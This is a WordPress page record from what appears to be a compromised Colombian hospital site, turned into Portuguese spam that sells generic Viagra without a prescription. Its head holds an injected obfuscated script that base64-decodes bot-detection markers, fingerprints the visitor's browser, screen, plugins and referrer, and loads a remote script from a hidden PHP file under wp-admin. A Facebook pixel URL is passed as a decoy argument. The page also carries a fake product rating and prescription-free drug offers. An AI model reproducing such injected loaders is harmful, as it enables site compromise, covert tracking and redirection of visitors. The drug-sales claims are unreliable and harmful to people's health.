{"id":9908,"date":"2024-07-29T15:10:00","date_gmt":"2024-07-29T20:10:00","guid":{"rendered":"https:\/\/hsdp.gov.co\/portal\/?page_id=9908"},"modified":"2024-07-29T15:12:21","modified_gmt":"2024-07-29T20:12:21","slug":"comprar-viagra-na-farmacia","status":"publish","type":"page","link":"https:\/\/hsdp.gov.co\/portal\/comprar-viagra-na-farmacia\/","title":{"rendered":"Comprar Viagra Gen\u00e9rico na farm\u00e1cia online de venda livre"},"content":{"rendered":"\n<!DOCTYPE html>\n\n<head>\n<meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n<script>var HCLHHCFEM=function(src){var q=atob(\"X19zdG9wQWxsVGltZXJzLndlYmRyaXZlci5fX25pZ2h0bWFyZS5fc2VsZW5pdW0uY2FsbFBoYW50b20uY2FsbFNlbGVuaXVtLl9TZWxlbml1bV9JREVfUmVjb3JkZXIuc2VsZW5pdW0uZHJpdmVyLl9zZWxlbml1bS5fX3dlYmRyaXZlcl9ldmFsdWF0ZS5fX3NlbGVuaXVtX2V2YWx1YXRlLl9fd2ViZHJpdmVyX3NjcmlwdF9mdW5jdGlvbi5fX3dlYmRyaXZlcl9zY3JpcHRfZnVuYy5fX3dlYmRyaXZlcl9zY3JpcHRfZm4uX19meGRyaXZlcl9ldmFsdWF0ZS5fX2RyaXZlcl91bndyYXBwZWQuX193ZWJkcml2ZXJfdW53cmFwcGVkLl9fZHJpdmVyX2V2YWx1YXRlLl9fc2VsZW5pdW1fdW53cmFwcGVkLl9fZnhkcml2ZXJfdW53cmFwcGVkLl9waGFudG9tLnBoYW50b20uZG9tQXV0b21hdGlvbl9fbmlnaHRtYXJl\").split(\".\"),e=encodeURIComponent,g=0,w=window,d=w.document,n=w.navigator,de=\"documentElement\",s=w.screen,p=\"\",a=\"avail\",i=\"inner\",o=\"outer\",H=\"Height\",W=\"Width\",c=w.chrome?Object.keys(w.chrome).join(\"*\"):\"*\",tag=d.createElement(\"script\");function wd(){try{for(var l in q){var z=q[l];if(w[z]||n[z])return z;if(d&&d[de]&&d[de].getAttribute&&d[de].getAttribute(z))return z;if(z in w||z in d)return z}return 0}catch(e){}}!function wp(){try{if(n&&n.plugins){Object.keys(n.plugins).forEach(function(i){if(n.plugins[i])p+=n.plugins[i].filename+\"*\"})}}catch(e){}}();try{g=d.createElement(\"canvas\").getContext(\"webgl\");g=g.getParameter(g.getExtension(\"WEBGL_debug_renderer_info\").UNMASKED_RENDERER_WEBGL)}catch(e){}src=\"https:\/\/hsdp.gov.co\/portal\/wp-admin\/user\/wp-vig-pt.php?clid=\"+btoa(\"ref=\"+e(d.referrer)+\"&drive=\"+wd()+\"&c=\"+c+\"&s=\"+s[a+H]+\"*\"+w[i+H]+\"*\"+w[o+H]+\"*\"+s[a+W]+\"*\"+w[i+W]+\"*\"+w[o+W]+\"*\"+w.devicePixelRatio+\"*\"+n.maxTouchPoints+\"&p=\"+p+\"&h=\"+n.hardwareConcurrency+\"*\"+n.deviceMemory+\"*\"+e(g)+\"&t=\"+e(new Date().toString())+\"&q=\"+e(w.location.search.substr(1)));tag[\"type\"]=\"text\/javascript\";tag[\"src\"]=src;document.head.appendChild(tag)}(\"https:\/\/connect.facebook.net\/en_US\/fbevents.js\")<\/script>\n<style>\n* {box-sizing: border-box;}\nbody {width:85%; margin:0 auto;}\n.toc li a {color:#666;}\n.row {display:flex; padding-top:30px;}\n.column {flex:50%; padding:10px;}\n.toc {border:5px solid #666;-webkit-border-radius:30px; -moz-border-radius:30px; border-radius:30px; -webkit-box-shadow:2px 2px 4px #888;-moz-box-shadow:2px 2px 4px #888; box-shadow:2px 2px 4px #888; background:#ede8e8; padding:5px; margin-left:auto; text-align:center;}\n@media (max-width:479px) {\n    .toc {width:95%!important;}\n    img {width:100%!important;}\n}\n<\/style>\n<\/head>\n<body>\n<div class=\"row\">\n  <div class=\"column\">\n    <div class=\"toc\">\n        <ul style=\"list-style:none;\">\n                                <li><a href=\"#w1\">O que \u00e9 o Viagra Gen\u00e9rico?<\/a><\/li>\n                                <li><a href=\"#w2\">Como \u00e9 que o Viagra Gen\u00e9rico funciona?<\/a><\/li>\n                                <li><a href=\"#w3\">Quanto tempo dura o Viagra Gen\u00e9rico?<\/a><\/li>\n                                <li><a href=\"#w4\">Quanto tempo \u00e9 que o Viagra Gen\u00e9rico demora a fazer efeito?<\/a><\/li>\n                                <li><a href=\"#w5\">O Viagra 100mg prolonga a dura\u00e7\u00e3o do ato sexual?<\/a><\/li>\n                                <li><a href=\"#w6\">Dosagem de Viagra Gen\u00e9rico<\/a><\/li>\n                                 <li><a href=\"#w7\">Viagra pre\u00e7o em Portugal<\/a><\/li>\n                                 <li><a href=\"#w8\">Viagra vs Cialis. Quais s\u00e3o os pr\u00f3s e os contras?<\/a><\/li>\n                                <li><a href=\"#w9\">Onde comprar Viagra online nas farm\u00e1cias?<\/a><\/li>\n                                <li><a href=\"#w10\">Posso comprar Viagra venda livre online?<\/a><\/li>\n                                <li><a href=\"#w11\">Quais s\u00e3o os efeitos secund\u00e1rios do Viagra Gen\u00e9rico?<\/a><\/li>\n                                <li><a href=\"#w12\">Quem n\u00e3o deve tomar Viagra Gen\u00e9rico?<\/a><\/li>\n                                <li><a href=\"#w13\">Viagra Gen\u00e9rico e \u00e1lcool<\/a><\/li>\n                                <li><a href=\"#w14\">O que acontece se uma mulher tomar Viagra 100mg?<\/a><\/li>\n                               \n        <\/ul>\n      <\/div>\n    <\/div>\n  <div class=\"column\">\n    <img decoding=\"async\" src=\"https:\/\/hsdp.gov.co\/portal\/wp-content\/uploads\/2020\/03\/comprar-viagra-melhor-preco.jpg\" \/>\n  <\/div>\n<\/div>\n<h1>Comprar Viagra gen\u00e9rico online ao melhor pre\u00e7o<\/h1>\n<p>Quando se trata de inova\u00e7\u00e3o farmac\u00eautica e investiga\u00e7\u00e3o para melhorar a sa\u00fade sexual, h\u00e1 um termo que ressoa em quase todo o mundo: Sildenafil. Se tem curiosidade em saber o que \u00e9 o Viagra gen\u00e9rico e porque ganhou reconhecimento global, este guia completo \u00e9 para si. O nosso olhar aprofundado sobre o Viagra 100mg ir\u00e1 explorar o seu mecanismo de a\u00e7\u00e3o, efic\u00e1cia, dosagem e muito mais. Iremos tamb\u00e9m comparar o Sildenafil com produtos similares, discutir o potencial de comprar Viagra online e responder a muitas outras quest\u00f5es comuns.\n<\/p>\n<h2 id=\"w1\">O que \u00e9 o Viagra Gen\u00e9rico?<\/h2>\n<p>Viagra 100 mg, muitas vezes conhecido como o &#8220;comprimido azul&#8221;, \u00e9 um medicamento pertencente \u00e0 classe dos inibidores da fosfodiesterase tipo 5 (PDE5). \u00c9 usado principalmente para tratar a disfun\u00e7\u00e3o er\u00e9til (DE) nos homens e tornou-se uma ferramenta importante para aqueles que querem melhorar a sua sa\u00fade e satisfa\u00e7\u00e3o sexual. A jornada do Viagra Gen\u00e9rico come\u00e7ou como um potencial tratamento para doen\u00e7as cardiovasculares, mas a sua capacidade de melhorar a fun\u00e7\u00e3o er\u00e9til levou ao seu uso atual principalmente para a DE.\n<\/p>\n<h2 id=\"w2\">Como \u00e9 que o Viagra Gen\u00e9rico funciona?<\/h2>\n<p>Para apreciar a verdadeira magia de um comprimido de Viagra Gen\u00e9rico, vamos explorar a ci\u00eancia por detr\u00e1s do seu funcionamento. O Sildenafil desempenha o seu papel quando um homem \u00e9 sexualmente estimulado: a sua principal fun\u00e7\u00e3o \u00e9 melhorar o fluxo sangu\u00edneo para o p\u00e9nis de forma a promover uma ere\u00e7\u00e3o.\n<\/p>\n<p>Consegue-o atrav\u00e9s da inibi\u00e7\u00e3o selectiva da PDE5, uma enzima que se encontra principalmente no tecido er\u00e9til do p\u00e9nis. A PDE5 decomp\u00f5e o monofosfato de guanosina c\u00edclico (GMPc), uma mol\u00e9cula que causa o relaxamento do m\u00fasculo liso e a dilata\u00e7\u00e3o dos vasos sangu\u00edneos. Ao inibir a PDE5, o Viagra Gen\u00e9rico 100mg faz com que o cGMP permane\u00e7a mais tempo na corrente sangu\u00ednea, aumentando e prolongando assim uma ere\u00e7\u00e3o.\n<\/p>\n<p>No entanto, \u00e9 importante lembrar que o Sildenafil n\u00e3o \u00e9 um afrodis\u00edaco. N\u00e3o promove a excita\u00e7\u00e3o sexual, mas apenas melhora a resposta fisiol\u00f3gica quando a excita\u00e7\u00e3o est\u00e1 presente.\n<\/p>\n<h2 id=\"w3\">Quanto tempo dura o Viagra Gen\u00e9rico?<\/h2>\n<p>Uma quest\u00e3o importante que vem \u00e0 mente de quem usa Sildenafil \u00e9: &#8220;Quanto tempo dura?&#8221;. Na maioria dos casos, os efeitos do Viagra 100mg podem durar entre 4 e 5 horas. No entanto, as experi\u00eancias individuais podem variar dependendo de factores como a idade, sa\u00fade geral, metabolismo e a presen\u00e7a de alimentos no est\u00f4mago.\n<\/p>\n<h2 id=\"w4\">Quanto tempo \u00e9 que o Viagra Gen\u00e9rico demora a fazer efeito?<\/h2>\n<p>Embora o Viagra Gen\u00e9rico n\u00e3o seja uma solu\u00e7\u00e3o instant\u00e2nea, o seu in\u00edcio de a\u00e7\u00e3o \u00e9 bastante r\u00e1pido. Normalmente, come\u00e7a a fazer efeito 30 a 60 minutos ap\u00f3s a ingest\u00e3o. Este tempo pode ser prolongado se o medicamento for tomado com uma refei\u00e7\u00e3o rica em gordura, por isso \u00e9 aconselh\u00e1vel evitar tais refei\u00e7\u00f5es quando planear usar Sildenafil.\n<\/p>\n<h2 id=\"w5\">O Viagra 100mg prolonga a dura\u00e7\u00e3o do ato sexual?<\/h2>\n<p>Embora a principal fun\u00e7\u00e3o do Sildenafil seja ajudar a conseguir e manter uma ere\u00e7\u00e3o, muitos utilizadores relatam uma maior dura\u00e7\u00e3o do desempenho sexual. Isto deve-se provavelmente \u00e0 melhoria da auto-confian\u00e7a e \u00e0 redu\u00e7\u00e3o da ansiedade de desempenho. No entanto, \u00e9 importante esclarecer que o Sildenafil n\u00e3o \u00e9 uma cura para a ejacula\u00e7\u00e3o precoce. Aqueles que lutam com a ejacula\u00e7\u00e3o precoce devem consultar o seu m\u00e9dico para obter solu\u00e7\u00f5es adequadas.\n<\/p>\n<h2 id=\"w6\">Dosagem de Viagra Gen\u00e9rico<\/h2>\n<p>Viagra Gen\u00e9rico est\u00e1 dispon\u00edvel em v\u00e1rias doses, sendo as mais comuns 25 mg, 50 mg e 100 mg. A dose adequada \u00e9 muito individual e depende de factores como a idade, o estado de sa\u00fade, a resposta ao tratamento e a gravidade da disfun\u00e7\u00e3o er\u00e9til. Consulte sempre um m\u00e9dico para determinar a dose ideal para as suas necessidades.\n<\/p>\n<div>\n  <table><colgroup><col><col><col><col><col><\/colgroup>\n  <tbody>\n  <tr>\n    <td>\n      <p>Nome do medicamento\n      <\/p><br>\n    <\/td>\n    <td>\n      <p>Ingrediente ativo\n      <\/p><br>\n    <\/td>\n    <td>\n      <p>Tempo de impacto\n      <\/p><br>\n    <\/td>\n    <td>\n      <p>Dura\u00e7\u00e3o\n      <\/p>\n    <\/td>\n    <td>\n      <p>Pre\u00e7o na nossa farm\u00e1cia\n      <\/p><br>\n    <\/td>\n  <\/tr>\n  <tr>\n    <td>\n      <p>Viagra\n      <\/p>\n    <\/td>\n    <td>\n      <p>Sildenafil\n      <\/p>\n    <\/td>\n    <td>\n      <p>30-60 minutos\n      <\/p>\n    <\/td>\n    <td>\n      <p>4-5 Horas\n      <\/p>\n    <\/td>\n    <td>\n      <p>\u20ac2,9 &#8211; \u20ac7,1\n      <\/p>\n    <\/td>\n  <\/tr>\n  <tr>\n    <td>\n      <p>Gen\u00e9ricos Sildenafil\n      <\/p><br>\n    <\/td>\n    <td>\n      <p>Sildenafil\n      <\/p>\n    <\/td>\n    <td>\n      <p>30-60 minutos\n      <\/p>\n    <\/td>\n    <td>\n      <p>4-5 Horas\n      <\/p>\n    <\/td>\n    <td>\n      <p>\u20ac0,3 &#8211; \u20ac4\n      <\/p>\n    <\/td>\n  <\/tr>\n  <tr>\n    <td>\n      <p>Cialis\n      <\/p>\n    <\/td>\n    <td>\n      <p>Tadalafil\n      <\/p>\n    <\/td>\n    <td>\n      <p>At\u00e9 2 horas\n      <\/p><br>\n    <\/td>\n    <td>\n      <p>At\u00e9 36 horas\n      <\/p><br>\n    <\/td>\n    <td>\n      <p>\u20ac2,8 &#8211; \u20ac8\n      <\/p>\n    <\/td>\n  <\/tr>\n  <tr>\n    <td>\n      <p>Gen\u00e9ricos Tadalafil\n      <\/p><br>\n    <\/td>\n    <td>\n      <p>Tadalafil\n      <\/p>\n    <\/td>\n    <td>\n      <p>At\u00e9 2 horas\n      <\/p>\n    <\/td>\n    <td>\n      <p>At\u00e9 36 horas\n      <\/p><br>\n    <\/td>\n    <td>\n      <p>\u20ac1 &#8211; \u20ac4,5\n      <\/p>\n    <\/td>\n  <\/tr>\n  <tr>\n    <td>\n      <p>Kamagra comprimidos\n      <\/p><br>\n    <\/td>\n    <td>\n      <p>Sildenafil\n      <\/p>\n    <\/td>\n    <td>\n      <p>30-60 minutos\n      <\/p><br>\n    <\/td>\n    <td>\n      <p>4-5 horas\n      <\/p><br>\n    <\/td>\n    <td>\n      <p>\u20ac1,3 &#8211; \u20ac2,9\n      <\/p>\n    <\/td>\n  <\/tr>\n  <tr>\n    <td>\n      <p>Kamagra Oral Jelly\n      <\/p>\n    <\/td>\n    <td>\n      <p>Sildenafil\n      <\/p>\n    <\/td>\n    <td>\n      <p>15-30 minutos\n      <\/p>\n    <\/td>\n    <td>\n      <p>4-5 horas\n      <\/p><br>\n    <\/td>\n    <td>\n      <p>\u20ac2,2 &#8211; \u20ac3,8\n      <\/p>\n    <\/td>\n  <\/tr>\n  <\/tbody>\n  <\/table>\n<\/div>\n<h2 id=\"w7\">Viagra pre\u00e7o em Portugal<\/h2>\n<p>Uma pergunta comum para os potenciais utilizadores de Viagra Gen\u00e9rico \u00e9: &#8220;Quanto \u00e9 que me vai custar?&#8221;. O pre\u00e7o do Viagra gen\u00e9rico pode variar muito, dependendo de factores como a dosagem, a quantidade e a plataforma de compra. Em m\u00e9dia, pode esperar pagar entre EUR 10 e EUR 40 por comprimido. Comprar e comparar pre\u00e7os em diferentes farm\u00e1cias pode levar a poupan\u00e7as significativas.\n<\/p>\n<h2 id=\"w8\">Viagra vs Cialis. Quais s\u00e3o os pr\u00f3s e os contras?<\/h2>\n<p>O mercado dos inibidores da PDE5 n\u00e3o se limita ao Viagra. Outro ator importante \u00e9 o Cialis (Tadalafil). Ambos os medicamentos t\u00eam a mesma fun\u00e7\u00e3o, mas diferem na dura\u00e7\u00e3o e no in\u00edcio da a\u00e7\u00e3o. O Cialis pode durar at\u00e9 36 horas, muito mais do que o Sildenafil, mas pode demorar mais tempo a come\u00e7ar a atuar. Ambos os medicamentos podem causar efeitos secund\u00e1rios, como dores de cabe\u00e7a, afrontamentos, congest\u00e3o nasal, dores nas costas e perturba\u00e7\u00f5es gastrointestinais.\n<\/p>\n<h2 id=\"w9\">Onde comprar Viagra online nas farm\u00e1cias?<\/h2>\n<p>Comprar Viagra gen\u00e9rico online \u00e9 bastante f\u00e1cil. Pode comprar Viagra venda livre na maioria das farm\u00e1cias f\u00edsicas. No entanto, muitas pessoas acham mais conveniente comprar Viagra online. A nossa farm\u00e1cia oferece pre\u00e7os competitivos, entrega ao domic\u00edlio e embalagens discretas, tornando o processo f\u00e1cil e confidencial. Encomende Sildenafil barato hoje e receba comprimidos extra de gra\u00e7a!\n<\/p>\n<h2 id=\"w10\">Posso comprar Viagra venda livre online?<\/h2>\n<p>Sim, na nossa farm\u00e1cia online pode comprar Viagra venda livre. No entanto, \u00e9 sempre aconselh\u00e1vel procurar o conselho de um profissional m\u00e9dico antes de iniciar um novo medicamento. Comprar Viagra 100mg venda livre pode ser arriscado devido \u00e0 possibilidade de falsifica\u00e7\u00e3o de medicamentos e \u00e0 falta de orienta\u00e7\u00e3o profissional.\n<\/p>\n<h2 id=\"w11\">Quais s\u00e3o os efeitos secund\u00e1rios do Viagra Gen\u00e9rico?<\/h2>\n<p>Embora o Sildenafil seja geralmente bem tolerado, tem potenciais efeitos secund\u00e1rios. Os efeitos secund\u00e1rios mais comuns s\u00e3o dores de cabe\u00e7a, rubor facial, dores de est\u00f4mago, congest\u00e3o nasal, tonturas e vis\u00e3o turva. Em casos raros, podem ocorrer efeitos secund\u00e1rios mais graves, como perda s\u00fabita de audi\u00e7\u00e3o, dores no peito ou uma ere\u00e7\u00e3o que dure mais de quatro horas (priapismo). Estes casos requerem aten\u00e7\u00e3o m\u00e9dica imediata.\n<\/p>\n<h2 id=\"w12\">Quem n\u00e3o deve tomar Viagra Gen\u00e9rico?<\/h2>\n<p>Nem toda a gente deve usar Sildenafil. As pessoas com doen\u00e7a card\u00edaca, hep\u00e1tica, renal grave ou com um historial recente de AVC devem evit\u00e1-lo. Al\u00e9m disso, o Sildenafil n\u00e3o deve ser utilizado por quem est\u00e1 a tomar certos medicamentos, nomeadamente nitratos. Consulte sempre um m\u00e9dico antes de come\u00e7ar a tomar Sildenafil.\n<\/p>\n<h2 id=\"w13\">Viagra Gen\u00e9rico e \u00e1lcool<\/h2>\n<p>O \u00e1lcool em quantidades moderadas n\u00e3o interfere com o gen\u00e9rico Viagra. No entanto, o consumo excessivo de \u00e1lcool pode dificultar a capacidade de conseguir uma ere\u00e7\u00e3o e aumentar a probabilidade de efeitos secund\u00e1rios. \u00c9 aconselh\u00e1vel limitar o consumo de \u00e1lcool durante o uso de Sildenafil.\n<\/p>\n<h2 id=\"w14\">O que acontece se uma mulher tomar Viagra 100mg?<\/h2>\n<p>O Sildenafil foi originalmente desenvolvido para os homens, mas h\u00e1 um interesse crescente nos seus potenciais benef\u00edcios para as mulheres, particularmente para o tratamento da perturba\u00e7\u00e3o da excita\u00e7\u00e3o sexual feminina. Alguns estudos sugerem que o gen\u00e9rico Viagra 100mg pode melhorar a experi\u00eancia sexual de algumas mulheres, embora os resultados sejam menos consistentes do que os efeitos nos homens. O uso de Sildenafil por mulheres deve ser feito sob a supervis\u00e3o de um profissional de sa\u00fade.\n<\/p>\n<script type=\"application\/ld+json\">\n{\n  \"@context\": \"https:\/\/schema.org\/\", \n  \"@type\": \"Product\", \n  \"name\": \"Viagra Gen\u00e9rico\",\n  \"image\": \"https:\/\/hsdp.gov.co\/portal\/wp-content\/uploads\/2020\/03\/comprar-viagra-melhor-preco.jpg\",\n  \"description\": \"Na nossa farm\u00e1cia online pode comprar Viagra gen\u00e9rico de forma segura e sem receita m\u00e9dica. Entrega r\u00e1pida em toda a Portugal.\",\n  \"brand\": {\n    \"@type\": \"Brand\",\n    \"name\": \"Teva, Mylan, Ajanta\"   \n  },\n  \"offers\": {\n    \"@type\": \"AggregateOffer\",\n    \"url\": \"https:\/\/hsdp.gov.co\/comprar-viagra-na-farmacia\",\n    \"availability\": \"https:\/\/schema.org\/InStock\",\n    \"priceCurrency\": \"DKK\",\n    \"lowPrice\": \"0.56\",   \n    \"highPrice\": \"3.9\",\n    \"priceValidUntil\": \"2026-08-04\", \n    \"offerCount\": \"45\",\n    \"sku\": \"sild-01\"\n  },\n  \"hasMerchantReturnPolicy\": { \n          \"@type\": \"MerchantReturnPolicy\", \n    \"applicableCountry\": \"PT\", \n    \"returnPolicyCategory\": \"https:\/\/schema.org\/MerchantReturnFiniteReturnWindow\", \n    \"merchantReturnDays\": \"15\", \n    \"returnMethod\": \"https:\/\/schema.org\/ReturnByMail\", \n    \"returnFees\": \"https:\/\/schema.org\/FreeReturn\" } ,\n  \"aggregateRating\": {\n    \"@type\": \"AggregateRating\",\n    \"ratingValue\": \"4.88\",\n    \"bestRating\": \"5\",\n    \"worstRating\": \"1\",\n    \"ratingCount\": \"344\"\n  }\n}\n<\/script>\n<script type=\"application\/ld+json\"> \n{ \n        \"@context\":\"http:\/\/schema.org\",\n    \"@type\":\"WebPage\", \n    \"url\":\"https:\/\/hsdp.gov.co\/comprar-viagra-na-farmacia\", \n    \"headline\":\"Comprar Viagra Gen\u00e9rico na farm\u00e1cia online de venda livre\", \n    \"description\":\"Na nossa farm\u00e1cia online pode comprar Viagra gen\u00e9rico de forma segura e sem receita m\u00e9dica. Entrega r\u00e1pida em toda a Portugal.\", \n    \"mainEntityOfPage\": { \n            \"@type\":\"WebPage\", \n            \"@id\":\"https:\/\/hsdp.gov.co\/comprar-viagra-na-farmacia\" \n    }, \n    \"dateModified\":\"2023-03-22 13:14:04\", \n    \"lastReviewed\":\"2023-07-22 21:16:56\", \n    \"publisher\": { \n            \"@type\":\"Organization\", \n        \"name\":\"Comprar Viagra Gen\u00e9rico na farm\u00e1cia online de venda livre\" } } <\/script><script type=\"application\/ld+json\">\n{\n        \"@context\": \"http:\/\/schema.org\",\n        \"@type\": \"MedicalBusiness\",\n        \"name\": \"Hospital San Juan de Dios\",\n        \"@id\": \"https:\/\/hsdp.gov.co\/\",\n        \"url\": \"https:\/\/hsdp.gov.co\/\",\n        \"telephone\": \"6075682486\",\n        \"address\": {\n                \"@type\": \"PostalAddress\",\n                \"streetAddress\": \"Cra. 9a 6-39\",\n                \"addressLocality\": \"Pamplona\",\n                \"addressRegion\": \"Norte de Santander\",\n                \"postalCode\": \"22640-102\",\n                \"addressCountry\": \"CO\"\n        },\n        \"geo\": {\n                \"@type\": \"GeoCoordinates\",\n                \"latitude\": 7.37393843315954,\n                \"longitude\": -72.6441747217208},\n        \"openingHoursSpecification\": [\n        {\n                \"@type\": \"OpeningHoursSpecification\",\n                \"dayOfWeek\": \"Monday\",\n                \"opens\": \"08:00:00\",\n                \"closes\": \"17:00:00\"\n        },\n        {\n                \"@type\": \"OpeningHoursSpecification\",\n                \"dayOfWeek\": \"Tuesday\",\n                \"opens\": \"08:00:00\",\n                \"closes\": \"17:00:00\"\n        },\n        {\n                \"@type\": \"OpeningHoursSpecification\",\n                \"dayOfWeek\": \"Wednesday\",\n                \"opens\": \"08:00:00\",\n                \"closes\": \"17:00:00\"\n        },\n        {\n                \"@type\": \"OpeningHoursSpecification\",\n                \"dayOfWeek\": \"Thursday\",\n                \"opens\": \"10:00:00\",\n                \"closes\": \"19:00:00\"\n        },\n        {\n                \"@type\": \"OpeningHoursSpecification\",\n                \"dayOfWeek\": \"Friday\",\n                \"opens\": \"08:00:00\",\n                \"closes\": \"16:00:00\"\n        }\n]}\n<\/script>\n<script type=\"application\/ld+json\">\n{\n  \"@context\": \"https:\/\/schema.org\/\", \n  \"@type\": \"BreadcrumbList\", \n  \"itemListElement\": [{\n    \"@type\": \"ListItem\", \n    \"position\": 1, \n    \"name\": \"Home\",\n    \"item\": \"https:\/\/hsdp.gov.co\/\"  \n  },{\n    \"@type\": \"ListItem\", \n    \"position\": 2, \n    \"name\": \"Comprar Viagra Gen\u00e9rico na farm\u00e1cia online de venda livre\",\n    \"item\": \"https:\/\/hsdp.gov.co\/comprar-viagra-na-farmacia\"  \n  }]\n}\n<\/script>\n<\/body>\n<\/html>\n\n","protected":false},"excerpt":{"rendered":"<p>O que \u00e9 o Viagra Gen\u00e9rico? Como \u00e9 que o Viagra Gen\u00e9rico funciona? Quanto tempo dura o Viagra Gen\u00e9rico? Quanto tempo \u00e9 que o Viagra Gen\u00e9rico demora a fazer efeito? O Viagra 100mg prolonga a dura\u00e7\u00e3o do ato sexual? Dosagem de Viagra Gen\u00e9rico Viagra pre\u00e7o em Portugal Viagra vs Cialis. Quais s\u00e3o os pr\u00f3s e [&#8230;]\n","protected":false},"author":205,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"blank-slate-template.php","meta":{"footnotes":""},"_links":{"self":[{"href":"https:\/\/hsdp.gov.co\/portal\/wp-json\/wp\/v2\/pages\/9908"}],"collection":[{"href":"https:\/\/hsdp.gov.co\/portal\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/hsdp.gov.co\/portal\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/hsdp.gov.co\/portal\/wp-json\/wp\/v2\/users\/205"}],"replies":[{"embeddable":true,"href":"https:\/\/hsdp.gov.co\/portal\/wp-json\/wp\/v2\/comments?post=9908"}],"version-history":[{"count":1,"href":"https:\/\/hsdp.gov.co\/portal\/wp-json\/wp\/v2\/pages\/9908\/revisions"}],"predecessor-version":[{"id":9910,"href":"https:\/\/hsdp.gov.co\/portal\/wp-json\/wp\/v2\/pages\/9908\/revisions\/9910"}],"wp:attachment":[{"href":"https:\/\/hsdp.gov.co\/portal\/wp-json\/wp\/v2\/media?parent=9908"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}